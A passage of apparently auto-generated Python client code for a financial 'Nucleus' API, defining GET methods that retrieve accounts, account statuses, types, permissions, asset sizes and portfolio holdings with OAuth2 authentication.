_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_allocation_mapping_using_get(self, account_allocation_id, **kwargs): # noqa: E501
"""Retrieve an account allocation # noqa: E501
Retrieve the information for a specific account-allocation mapping for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_allocation_mapping_using_get(account_allocation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_allocation_id: UUID account_allocation_id (required)
:return: AccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_allocation_mapping_using_get_with_http_info(account_allocation_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_allocation_mapping_using_get_with_http_info(account_allocation_id, **kwargs) # noqa: E501
return data
def get_account_allocation_mapping_using_get_with_http_info(self, account_allocation_id, **kwargs): # noqa: E501
"""Retrieve an account allocation # noqa: E501
Retrieve the information for a specific account-allocation mapping for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_allocation_mapping_using_get_with_http_info(account_allocation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_allocation_id: UUID account_allocation_id (required)
:return: AccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_allocation_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_allocation_mapping_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_allocation_id' is set
if self.api_client.client_side_validation and ('account_allocation_id' not in params or
params['account_allocation_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_allocation_id` when calling `get_account_allocation_mapping_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_allocation_id' in params:
path_params['account_allocation_id'] = params['account_allocation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_allocation/{account_allocation_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountAllocationMapping', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_asset_size_agg_all_using_get(self, account_id, **kwargs): # noqa: E501
"""List all account asset sizes # noqa: E501
Get a list of asset sizes by date for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_asset_size_agg_all_using_get(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: Account Id (required)
:param str currency_conversion: USD
:param date end_date: end date
:param bool exclude_subledger: true or false
:param bool get_latest: true or false
:param str sort_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in ()
:param date start_date: start date
:return: list[AvailableDateDoubleVO]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_asset_size_agg_all_using_get_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_asset_size_agg_all_using_get_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_asset_size_agg_all_using_get_with_http_info(self, account_id, **kwargs): # noqa: E501
"""List all account asset sizes # noqa: E501
Get a list of asset sizes by date for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_asset_size_agg_all_using_get_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: Account Id (required)
:param str currency_conversion: USD
:param date end_date: end date
:param bool exclude_subledger: true or false
:param bool get_latest: true or false
:param str sort_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in ()
:param date start_date: start date
:return: list[AvailableDateDoubleVO]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'currency_conversion', 'end_date', 'exclude_subledger', 'get_latest', 'sort_type', 'start_date'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_asset_size_agg_all_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `get_account_asset_size_agg_all_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
if 'currency_conversion' in params:
query_params.append(('currency_conversion', params['currency_conversion'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'exclude_subledger' in params:
query_params.append(('exclude_subledger', params['exclude_subledger'])) # noqa: E501
if 'get_latest' in params:
query_params.append(('get_latest', params['get_latest'])) # noqa: E501
if 'sort_type' in params:
query_params.append(('sort_type', params['sort_type'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}/asset_size', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[AvailableDateDoubleVO]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_overview_using_get(self, account_id, **kwargs): # noqa: E501
"""List all Account overview # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_overview_using_get(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param bool ascending: ascending
:param str order_by: order_by
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_overview_using_get_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_overview_using_get_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_overview_using_get_with_http_info(self, account_id, **kwargs): # noqa: E501
"""List all Account overview # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_overview_using_get_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param bool ascending: ascending
:param str order_by: order_by
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'ascending', 'order_by'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_overview_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `get_account_overview_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}/account_overview', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_permission_using_get(self, account_id, **kwargs): # noqa: E501
"""Get an account permission # noqa: E501
Get an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_permission_using_get(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: account_id (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_permission_using_get_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_permission_using_get_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_permission_using_get_with_http_info(self, account_id, **kwargs): # noqa: E501
"""Get an account permission # noqa: E501
Get an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_permission_using_get_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: account_id (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_permission_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `get_account_permission_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_permission/{account_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountPermissionVO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_status_all_using_get(self, **kwargs): # noqa: E501
"""List all account statuses # noqa: E501
Get the account status history information for all accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_status_all_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_status_all_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_account_status_all_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_account_status_all_using_get_with_http_info(self, **kwargs): # noqa: E501
"""List all account statuses # noqa: E501
Get the account status history information for all accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_status_all_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ascending', 'filter', 'order_by', 'page', 'size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_status_all_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageAccountStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_status_using_get(self, account_status_id, **kwargs): # noqa: E501
"""Retrieve an account status # noqa: E501
Retrieve the information for a specific account status record for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_status_using_get(account_status_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_status_id: UUID account_status_id (required)
:return: AccountStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_status_using_get_with_http_info(account_status_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_status_using_get_with_http_info(account_status_id, **kwargs) # noqa: E501
return data
def get_account_status_using_get_with_http_info(self, account_status_id, **kwargs): # noqa: E501
"""Retrieve an account status # noqa: E501
Retrieve the information for a specific account status record for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_status_using_get_with_http_info(account_status_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_status_id: UUID account_status_id (required)
:return: AccountStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_status_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_status_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_status_id' is set
if self.api_client.client_side_validation and ('account_status_id' not in params or
params['account_status_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_status_id` when calling `get_account_status_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_status_id' in params:
path_params['account_status_id'] = params['account_status_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_status/{account_status_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_type_all_using_get(self, **kwargs): # noqa: E501
"""List all account types # noqa: E501
List all account types defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_type_all_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_type_all_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_account_type_all_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_account_type_all_using_get_with_http_info(self, **kwargs): # noqa: E501
"""List all account types # noqa: E501
List all account types defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_type_all_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ascending', 'filter', 'order_by', 'page', 'size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_type_all_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_type', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageAccountType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_type_using_get(self, account_type_id, **kwargs): # noqa: E501
"""Get an Account Type # noqa: E501
Get an account types defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_type_using_get(account_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_type_id: UUID account_type_id (required)
:return: AccountType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_type_using_get_with_http_info(account_type_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_type_using_get_with_http_info(account_type_id, **kwargs) # noqa: E501
return data
def get_account_type_using_get_with_http_info(self, account_type_id, **kwargs): # noqa: E501
"""Get an Account Type # noqa: E501
Get an account types defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_type_using_get_with_http_info(account_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_type_id: UUID account_type_id (required)
:return: AccountType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_type_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_type_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_type_id' is set
if self.api_client.client_side_validation and ('account_type_id' not in params or
params['account_type_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_type_id` when calling `get_account_type_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_type_id' in params:
path_params['account_type_id'] = params['account_type_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_type/{account_type_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_using_get(self, account_id, **kwargs): # noqa: E501
"""Retrieve an account # noqa: E501
Retrieve the information for a specific account associated with a client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_using_get(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_using_get_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_using_get_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_using_get_with_http_info(self, account_id, **kwargs): # noqa: E501
"""Retrieve an account # noqa: E501
Retrieve the information for a specific account associated with a client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_using_get_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `get_account_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Account', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_account_permission_using_get(self, **kwargs): # noqa: E501
"""List all account permission # noqa: E501
List all account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_account_permission_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_account_permission_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_account_permission_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_all_account_permission_using_get_with_http_info(self, **kwargs): # noqa: E501
"""List all account permission # noqa: E501
List all account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_account_permission_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ascending', 'filter', 'order_by', 'page', 'size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_account_permission_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_permission', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageAccountPermissionVO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_portfolio_holding_agg_all_using_get(self, account_id, **kwargs): # noqa: E501
"""List all account holdings # noqa: E501
Get information for all the securities that are currently being held by an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_holding_agg_all_using_get(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date
:param str filter: filter
:param bool get_latest: true or false
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date
:return: PagePortfolioHoldingAgg
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_portfolio_holding_agg_all_using_get_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_portfolio_holding_agg_all_using_get_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_portfolio_holding_agg_all_using_get_with_http_info(self, account_id, **kwargs): # noqa: E501
"""List all account holdings # noqa: E501
Get information for all the securities that are currently being held by an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_holding_agg_all_using_get_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date
:param str filter: filter
:param bool get_latest: true or false
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date
:return: PagePortfolioHoldingAgg
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'ascending', 'currency_conversion', 'end_date', 'filter', 'get_latest', 'order_by', 'page', 'size', 'start_date'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_portfolio_holding_agg_all_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `get_portfolio_holding_agg_all_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'currency_conversion' in params:
query_params.append(('currency_conversion', params['currency_conversion'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'get_latest' in params:
query_params.append(('get_latest', params['get_latest'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}/holding', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PagePortfolioHoldingAgg', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
